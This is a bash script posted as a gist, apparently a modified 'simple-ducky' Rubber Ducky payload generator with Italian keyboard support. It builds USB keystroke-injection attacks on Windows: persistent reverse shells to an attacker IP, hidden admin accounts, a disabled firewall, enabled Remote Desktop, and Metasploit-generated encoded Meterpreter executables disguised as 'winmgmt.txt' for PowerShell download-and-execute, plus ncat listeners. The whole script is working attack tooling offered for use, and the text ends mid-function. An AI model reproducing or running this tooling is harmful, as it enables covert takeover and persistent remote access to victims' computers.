DiegoCaridei
8/21/2015 - 9:42 PM

Rubber ducky italian script

Rubber ducky italian script

#!/bin/bash
#################################################################################
#################################################################################
#
# Windows Reverse Shell Payloads
#
#################################################################################
#################################################################################

#################################################################################
# Persistence Reverse Shell w/UAC (Win Vista/7)
#################################################################################
#1) donwnload the file wget https://simple-ducky-payload-generator.googlecode.com/files/installer_v1.1.1_debian.sh
#2) Install script 
#3) download italian file config https://www.dropbox.com/s/5cfmwfth91z794q/it.properties?dl=0
#4) go at this folder /usr/share/simple-ducky and reply the script simple-ducky.sh with this script
#5) add in the resources folder the file it.properties



function_lan(){
	clear
	echo -e "\e[1;34mPlease enter the keyboard code you would like to use.\e[0m"
	echo ""
	echo "it: Italian"
	echo "fr: French"
	echo "pt: Portuguese"
	echo "us: English-US"
	echo "be: Belgian"
	echo "da: Danish"f
	echo "de: German"
	echo "no: Norwegian"
	echo "sv: Swedish"
	echo "uk: English-UK"
	echo ""
}


f_persistenceVIS7uac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell everytime a victim logs into his/her computer. It also creates and hides an admin account, drops the firewall, and enables Remote Deskop/Remote Assistance."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC enabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo ""
	echo ""
	read -p "What would you like the username to be for your admin account? " attackeruser
	echo ""
	read -p "What would you like the password to be for your admin account? " attackerpass
	echo ""
	read -p "Where shall I send your persistent shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "What is the IP/Domain address for your webserver? "
	read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	read -p "If you are using Kali, would you like me to move ncat.exe to your web directory and start your webserver [y/n]? " Ncat
	if [ "$Ncat" == "y" ]; then
		clear
		cp /usr/share/simple-ducky/misc/ncat.exe /var/www/
		service apache2 stop
		service apache2 start
		clear
	else
	clear
	fi
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/persistenceVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
		function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		xterm -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
		clear
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Persistence Reverse Shell w/o UAC (Win Vista/7)
#################################################################################
f_persistenceVIS7nouac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell everytime a victim logs into his/her computer. It also creates and hides an admin account, drops the firewall, and enables Remote Deskop/Remote Assistance."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC disabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo ""
	echo ""
	read -p "What would you like the username to be for your admin account? " attackeruser
	echo ""
	read -p "What would you like the password to be for your admin account? " attackerpass
	echo ""
	read -p "Where shall I send your persistent shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "What is the IP/Domain address for your webserver? "
	read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	read -p "If you are using Kali, would you like me to move ncat.exe to your web directory and start your webserver [y/n]? " Ncat
	if [ "$Ncat" == "y" ]; then
		clear
		cp /usr/share/simple-ducky/misc/ncat.exe /var/www/
		service apache2 stop
		service apache2 start
		clear
	else
	clear
	fi
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/persistenceVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
		function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
		clear
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Persistence Reverse Shell w/UAC (Win 8)
#################################################################################
f_persistenceWIN8uac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell everytime a victim logs into his/her computer. It also creates and hides an admin account, drops the firewall, and enables Remote Deskop/Remote Assistance."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 with UAC enabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo ""
	echo ""
	read -p "What would you like the username to be for your admin account? " attackeruser
	echo ""
	read -p "What would you like the password to be for your admin account? " attackerpass
	echo ""
	read -p "Where shall I send your persistent shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "What is the IP/Domain address for your webserver? "
	read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	read -p "If you are using Kali, would you like me to move ncat.exe to your web directory and start your webserver [y/n]? " Ncat
	if [ "$Ncat" == "y" ]; then
		clear
		cp /usr/share/simple-ducky/misc/ncat.exe /var/www/
		service apache2 stop
		service apache2 start
		clear
	else
	clear
	fi
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/persistenceWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
   	function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
		clear
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Persistence Reverse Shell w/o UAC (Win 8)
#################################################################################
f_persistenceWIN8nouac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell everytime a victim logs into his/her computer. It also creates and hides an admin account, drops the firewall, and enables Remote Deskop/Remote Assistance."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 with UAC disabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo ""
	echo ""
	read -p "What would you like the username to be for your admin account? " attackeruser
	echo ""
	read -p "What would you like the password to be for your admin account? " attackerpass
	echo ""
	read -p "Where shall I send your persistent shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "What is the IP/Domain address for your webserver? "
	read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	read -p "If you are using Kali, would you like me to move ncat.exe to your web directory and start your webserver [y/n]? " Ncat
	if [ "$Ncat" == "y" ]; then
		clear
		cp /usr/share/simple-ducky/misc/ncat.exe /var/www/
		service apache2 stop
		service apache2 start
		clear
	else
	clear
	fi
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/persistenceWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
		function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
		clear
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Windows Reverse Shell (No Download|W2K/XP)
#################################################################################
f_windowsrevW2KXP(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide an adminstrative reverse shell when the Powershell, Download, and Execute is not feesable."
	echo -e "\e[1;31mTarget:\e[0m WIN2K/XP"
	echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen (Props to IllWill)"
	echo ""
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/windowsrevW2KXP.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
		clear
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Windows Reverse Shell w/UAC (No Download|Win Vista/7)
#################################################################################
f_windowsrevVIS7uac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide an adminstrative reverse shell when Powershell, Download, and Execute is not feesable."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC enabled\e[0m"
	echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen (Props to IllWill)(slight modifications by skysploit)"
	echo ""
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use milliseconds (15000 ms = 15 sec)" pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/windowsrevVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
	  function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
		clear
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Windows Reverse Shell w/o UAC (No Download|Win Vista/7)
#################################################################################
f_windowsrevVIS7nouac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide an adminstrative reverse shell when Powershell, Download, and Execute is not feesable."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC enabled\e[0m"
	echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen (Props to IllWill)(slight modifications by skysploit)"
	echo ""
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/windowsrevVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Windows Reverse Shell w/UAC (No Download|Win 8)
#################################################################################
f_windowsrevWIN8uac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide an adminstrative reverse shell when Powershell, Download, and Execute is not feesable."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC enabled\e[0m"
	echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen (Props to IllWill)(slight modifications by skysploit)"
	echo ""
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/windowsrevWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
		clear
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Windows Reverse Shell w/o UAC (No Download|Win 8)
#################################################################################
f_windowsrevWIN8nouac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide an adminstrative reverse shell when Powershell, Download, and Execute is not feesable."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC enabled\e[0m"
	echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen (Props to IllWill)(slight modifications by skysploit)"
	echo ""
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/windowsrevWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
	  function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Powershell Download & Execute (User Priv Shell|Win Vista/7)
#################################################################################
f_powershellVIS7(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses Powershell to download and execute an evil payload"
	echo -e "\e[1;31mNote:\e[0m The evil payload is generated by Metasploit, and will provide either a Meterpreter or Standard shell. The payload will automatically be dropped in your web (/var/www) directory and will be titled 'winmgmt.txt'. Once the payload is downloaded on the victim's machine it is converted to a .exe and run with user privileges."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7"
	echo -e "\e[1;31mAuthor:\e[0m mubix"
	echo ""
	echo ""
	echo -e "\e[1;34mLets start by building your evil executable\e[0m"
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo -e ""
	read -p "Would you like a meterpreter or Ncat shell[met/nc]? " payloadtype
	clear
	echo -e "\e[1;34mMetasploit is generating your payload, this will take a moment...\e[0m"

	if [ "$payloadtype" == "met" ]; then
		msfpayload windows/meterpreter/reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/winmgmt.txt
	else
		msfpayload windows/shell_reverse_tcp LHOST=$attackerip LPORT=$attackerport R |  msfencode -e x86/shikata_ga_nai -c 5 -t exe -o  /var/www/winmgmt.txt
	fi

	echo -e ""
	echo -e "\e[1;34mDone!\e[0m"
    sleep 3
    clear
	echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
	echo ""
	echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
	read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m"
	echo ""
	sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/powershellVIS7.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.txt\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
